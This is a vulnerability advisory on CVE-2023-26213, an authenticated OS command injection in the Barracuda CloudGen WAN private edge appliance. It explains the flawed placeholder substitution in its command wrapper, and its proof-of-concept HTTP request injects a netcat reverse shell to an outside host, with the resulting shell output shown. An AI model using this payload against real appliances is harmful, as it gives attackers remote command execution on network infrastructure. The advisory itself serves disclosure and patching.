Vendor description
"CloudGen WAN is more than just another SD-WAN solution. It lets you build an automated cloud-based network by leveraging the Microsoft Global Network. The product of a joint development program by Microsoft and Barracuda, CloudGen WAN is the only global secure SD-WAN service built natively on Azure. It is a single, unified solution that makes it very simple to ensure highly secure, seamless connectivity to all your locations and all your cloud-based resources and applications."
Source: www.barracuda.com/products/network-security/cloudgen-wan
Business recommendation
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.
Vulnerability overview/description
1) Authenticated OS Command Injection (CVE-2023-26213)
Barracuda CloudGen WAN provides a private edge appliance for hybrid deployments. An authenticated user in the administration interface for the private edge virtual appliance can inject arbitrary OS commands via the
/ajax/update_certificate
endpoint.
Proof of concept
1) Authenticated OS Command Injection (CVE-2023-26213)
The affected PHP application running on the appliance implements a custom wrapper for securely executing OS commands. The wrapper is inspired by SQL prepared statements and uses placeholders. Unfortunately an attacker can inject new placeholder strings within arguments. In the case where two or more arguments are controlled by the user, this allows an attacker to craft a placeholder which executes arbitrary commands.
Example of a vulnerable call:
// Extract the cert with the password
$extract_cert_status = BN_Shell::exec(
"openssl pkcs12 -in :tmp_cert -out :dst -clcerts -nokeys -passin pass::password",
array(
'tmp_cert' => $cert_folder . $name . '.base64',
'dst' => $cert_folder . $name,
'password' => $password
)
);
Excerpt from BN_Shell::exec():
// Execute a full command.
// If you need to escape arguments, replace them with bind params, similar to sql binds.
// Example: exec('ls /tmp/')
// Example: exec('cp :source :dest', array('source' => '/src/dir/', 'dest' => '/dest/dir'))
public static function exec($command, array $params = array()) {
// escape and replace binds with values
foreach($params as $param => $value) {
$value = static::escape($value); // --- SEC Consult: this internally calls escapeshellargs() on the argument
$command = str_replace(":$param", $value, $command);
}
static::$_last_command = $command;
$return = array();
// use proc_open to get stdout and stderr
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a file to write to
);
The following HTTP request exploits the issue.
The "name" argument contains the placeholder string ":password". At runtime, this is replaced by the argument "password", which in this case executes a reverse shell.
POST /ajax/update_certificate HTTP/1.1
Host: host
Cookie: session_id=jk7dai0pv2vr9npoarfqnuajll
X-Csrf-Token: 2da43562a3e1552259dea8dde327cd97c5176fdd
Content-Type: application/json;charset=utf-8
Content-Length: 999
{"pem":{"certificate":{},"key":{}},"pems":{"certificate":{},"key":{}},"pkcs12":{"certificate":{"content":"XXXXXXXXXXXXXXXX","name":"keyStoreAAA :password.pfx"},"key":{},"password":"; nc -e /bin/sh 192.168.200.1 4242 # XXX"},"currentType":"pkcs12"}
$ nc -l -p 4242
id
uid=48(www-data) gid=48(www-data) groups=48(www-data)
Vulnerable / tested versions
The issue was found in Barracuda CloudGen WAN (private edge appliance) version 8.3.1 (GWAY-8.3.1-0086-VTxxx.ova).